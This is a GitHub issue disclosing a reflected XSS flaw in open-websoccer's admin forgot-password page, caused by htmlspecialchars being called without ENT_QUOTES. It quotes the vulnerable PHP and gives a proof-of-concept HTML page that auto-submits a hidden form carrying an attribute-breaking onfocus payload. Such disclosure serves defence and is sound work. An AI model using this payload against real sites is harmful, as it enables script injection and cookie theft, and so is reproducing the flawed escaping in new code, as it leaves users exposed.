Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

A xss vulnerability #131

Open
LioTree opened this issue May 3, 2024 · 1 comment
Open

A xss vulnerability #131

LioTree opened this issue May 3, 2024 · 1 comment

Comments

@LioTree
Copy link

LioTree commented May 3, 2024

Hi, there is a xss vulnerability in websoccer/admin/forgot-password.php. At line 129, The $_POST['inputEmail'] is inserted into the value attribute of <input> tag and is escaped by escapeOutput, which is actually employs htmlspecialchars($message, ENT_COMPAT, 'UTF-8') at line 30 of websoccer/admin/functions.inc.php. However, htmlspecialchars doesn't escape ' without the ENT_QUOTES flag. Therefore, an attacker can still exploit this by using ' to break out of value attribute and inject other attributes within malicious Javascript code. This allows attackers to obtain cookies of administrator and other users and fake their login using obtained cookies.

$inputEmail = (isset($_POST['inputEmail'])) ? trim($_POST['inputEmail']) : FALSE;
......
<input type='email' name='inputEmail' id='inputEmail' placeholder='E-Mail' value='<?php echo escapeOutput($inputEmail); ?>'>
/**
 * Escapes for HTML output. Uses <code>htmlspecialchars</code> (UTF-8).
 * 
 * @param string $message message string to escape.
 * @return string escaped input string, ready for secure HTML output.
 */
function escapeOutput($message) {
	return htmlspecialchars($message, ENT_COMPAT, 'UTF-8');
}

The POC is as follows:

Create a malicious webpage designed to inject JavaScript code into the target page(http://xxxx/admin/forgot-password.php):

<html>
<head>
    <script>
        window.onload = function() {
            document.getElementById("postsubmit").click();
        }
    </script>
</head>

<body>
    <form method="post" action="http://localhost/open-websoccer/websoccer/admin/forgot-password.php">
        <input id="xssr_in" type="text" style="display:none" name="inputEmail" value="' onfocus=alert(1) autofocus '" />
        <div style="display:none;"><input id="postsubmit" type="submit" name="submit" value="submit" /></div>
    </form>
</body>
</html>

When the victim visits this malicious page, the javascript code will be executed under the target page.

327700028-ff89ca38-7da6-43e6-8bd2-0666017ed2e8
@SulivanM
Copy link

Wow, we can make a pull request but its better to work a new version with laravel framework for exemple x)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@LioTree @SulivanM